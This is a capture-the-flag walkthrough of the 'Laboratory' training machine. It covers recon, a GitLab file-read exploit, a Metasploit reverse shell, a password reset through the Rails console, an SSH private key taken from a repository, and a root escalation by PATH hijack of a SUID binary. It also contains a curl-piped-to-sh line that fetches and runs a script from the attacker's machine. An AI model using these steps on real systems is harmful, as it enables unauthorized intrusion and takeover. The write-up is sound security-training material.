# Laboratory ## Recon `nmap -sV -T4 -p- 10.10.10.216` ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu)) Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Accessing the IP address via HTTP returns a 302 status code, and redirects to `https://laboratory.htb/` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnFNZkVRBWiiZ6YER%2Ff827cf0c325f46dfa1da1071d0dd4117.png?alt=media\&token=beb6de12-98b1-4330-a2e2-65f151836969) Add the following line to the `/etc/hosts` file: ``` 10.10.10.216 laboratory.htb ``` Now the page displays properly. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnIbiTFGRPjlP9yFj%2F2ea7149a079e454a8f1a569edb9bb805.png?alt=media\&token=205aec48-ba32-496b-94e5-8979a7a804d2) If we scroll down, we can see that Dexter is listed as the CEO of the company. Looking at the source code: ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnM_Bt-rNi9xRu-U9%2Fdae7bb4923c1417bb33a78b0a7b2c22d.png?alt=media\&token=b5733264-4e9b-441a-b921-065d5e3a7d40) Navlinks commented out. However, `elements.html` and `generic.html` do not exist. `gobuster dir -u https://laboratory.htb/ -w /usr/share/wordlists/dirb/common.txt -k` ``` /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /assets (Status: 301) /images (Status: 301) /index.html (Status: 200) /server-status (Status: 403) ``` When I first ran gobuster without the `-w` flag, I got this error: ``` Error: error on running goubster: unable to connect to https://laboratory.htb/: invalid certificate: x509: certificate is valid for git.laboratory.htb, not laboratory.htb ``` So I added the following to `/etc/hosts`: ``` 10.10.10.216 git.laboratory.htb ``` and accessed `git.laboratory.htb`. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnS0vfymeOqo-2hN9%2F6935335c792e44c5a7e3db348ae4852e.png?alt=media\&token=31deeec3-9736-4772-8443-700578c2e393) ## Foothold `searchsploit gitlab` ``` --------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- GitLab - 'impersonate' Feature Privilege Escalation | ruby/webapps/40236.txt GitLab 11.4.7 - RCE (Authenticated) | ruby/webapps/49334.py Gitlab 11.4.7 - Remote Code Execution | ruby/webapps/49257.py GitLab 11.4.7 - Remote Code Execution (Authenticated) | ruby/webapps/49263.py GitLab 12.9.0 - Arbitrary File Read | ruby/webapps/48431.txt Gitlab 12.9.0 - Arbitrary File Read (Authenticated) | ruby/webapps/49076.py Gitlab 6.0 - Persistent Cross-Site Scripting | php/webapps/30329.sh Gitlab-shell - Code Execution (Metasploit) | linux/remote/34362.rb Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting | java/webapps/47927.txt NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution | json/webapps/47420.txt --------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- ``` I went ahead and created an account. Note: to overcome the email domain validation, use `@laboratory.htb` for the email domain. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnVJTylsiNExeYW-E%2Ff4ecdba01e83475fa505cb86b1ea7503.png?alt=media\&token=7e522088-b34c-4086-97e7-7a9d523e9d90) ### First Try: Gitlab 12.9.0 - Arbitrary File Read Found an exploit code here: (for Gitlab 12.9.0 - Arbitrary File Read) `python3 gitlab_exploit.py https://git.laboratory.htb me zeyu2001` We can read the `/etc/passwd` file: ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnYaOWAJzdxJWDI3e%2F2d1b6606cace422b8d43c31ccbcc74a8.png?alt=media\&token=b942d465-f3b7-4186-855e-d8255b88fff4) ### Second Try: Gitlab 11.4.7 - Remote Code Execution Didn't work with any of the open-source Python scripts. If this was the actual OSCP, I would have used my Metasploit 'budget' on this machine. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadngzmCnp7VHC-a2Mk%2F246ca55d690a46399c40ce9ab7351def.png?alt=media\&token=d80e5a9b-76dd-459c-ade7-cd4dc3219f18) Using Metasploit with the above options, I was able to spawn a reverse shell. 'Upgrade' the shell: `python3 -c 'import pty;pty.spawn("/bin/bash")'` ## User Flag Now that we gained a shell as the `git` user, we are inside the `gitlab-rails` CLI. In order to gain access to Dexter's account, we need to reset the password, like this: Since Dexter is likely the 'main user', I guessed that his user ID is 1. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madnk-bgpwLG2q6sZq4%2F934696a5142a4a54aca5019307da4234.png?alt=media\&token=5475bd6e-a8e2-43b5-b67f-92475f65dc1d) Full commands to reset the password via Rails Console: ``` gitlab-rails console -e production user = User.find(1) user.password = 'mynewpass' user.password_confirmation = 'mynewpass' user.save! exit() ``` Using the `dexter:mynewpass` combination, we can login to the GitLab web GUI. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnmdhAph3ToFuJKfp%2F06acc8974db44e15b5da86e1c2fdc428.png?alt=media\&token=bccdd316-6a28-49c8-a9f1-225cd792981e) I then tried to SSH into Dexter's account, but a public/private key pair is required. From the SecureDocker repo, we can navigate to `securedocker/dexter/.ssh/id_rsa` to get the private key. Save this in a file `id_rsa` on the attacking machine. Note that the public key for this privste key is in the `securedocker/dexter/.ssh/authorized_keys` file. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madnq-pjNPon8lqnGvN%2F7f7cce2dac67451a8dbcebfa503e1331.png?alt=media\&token=080ef164-1131-475b-816d-c08150f201bc) SSH in: `ssh -i id_rsa dexter@git.laboratory.htb`. We can now get the `user.txt`: ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadntL68Slu3BX5ykPO%2F00d0ac0ba88a4534a148b66f7c6ddf27.png?alt=media\&token=d103ffa7-f053-44f9-a601-e46c2f58bb3f) ## Root Flag Run LinPEAS (start Python Simple HTTP Server on attacking machine, then do `curl "http://10.10.14.16/linpeas.sh" | sh` in SSH) ### Try 1: containerd / runc ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnwjcxADFyhI5py-B%2F09236e2325bc49e393211642413b1d13.png?alt=media\&token=942edfe4-f585-4946-a960-87f1824b5858) Sadly, neither worked. ### Try 2: SUID Files In the list of SUID files (from the LinPEAS output), the `/usr/local/bin/docker-security` binary looked out of place. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadnzaucSpBj7mjp2fc%2F4bda9b4402c24ac9b54b9c8d2fc28245.png?alt=media\&token=30375271-b373-405b-adc0-b2b9fd063237) Strings wasn't installed on the target machine, so I downloaded the binary into my Kali machine: `scp -i id_rsa dexter@laboratory.htb:/usr/local/bin/docker-security .` ### PATH Variable Manipulation `strings docker-security` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Mado1tPzUIYVRAcrwFF%2F2d7f05e7b4dc46ceb85876ed3730866a.png?alt=media\&token=d115467c-f210-44f1-b1af-21409ef60570) Good, the binary uses *relative* paths for `setuid`, etc. This allows us to create our own `setuid` binary, and manipuate the PATH variable so that our own binary is executed instead. #### Standard Steps * Change working directory to `/tmp`: `cd /tmp` * Copy the `/bin/sh` shell and call it `setuid`: `echo /bin/sh > setuid` * Give the correct permissions: `chmod 777 setuid` * Put its location, the `/tmp` directory, in the PATH: `export PATH=/tmp:$PATH` ```bash dexter@laboratory:~$ cd /tmp dexter@laboratory:/tmp$ echo /bin/sh > setuid dexter@laboratory:/tmp$ chmod 777 setuid dexter@laboratory:/tmp$ export PATH=/tmp:$PATH dexter@laboratory:/tmp$ /usr/local/bin/docker-security ``` Since the SUID flag is set, the `/bin/sh` is run as `root`, which is the *owner* of the file. Here, we created a fake `setuid` binary and added the `/tmp` directory to the PATH. When the `docker-security` binary runs `setuid`, our fake binary is run, spawning a bash shell as root. ### Getting the Root Flag ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Mado7vcNVEJf3wgKqds%2Fa81e92142dcd4472a904b656d61aa47e.png?alt=media\&token=46c70bb5-157f-479d-962d-1993ffec4c76)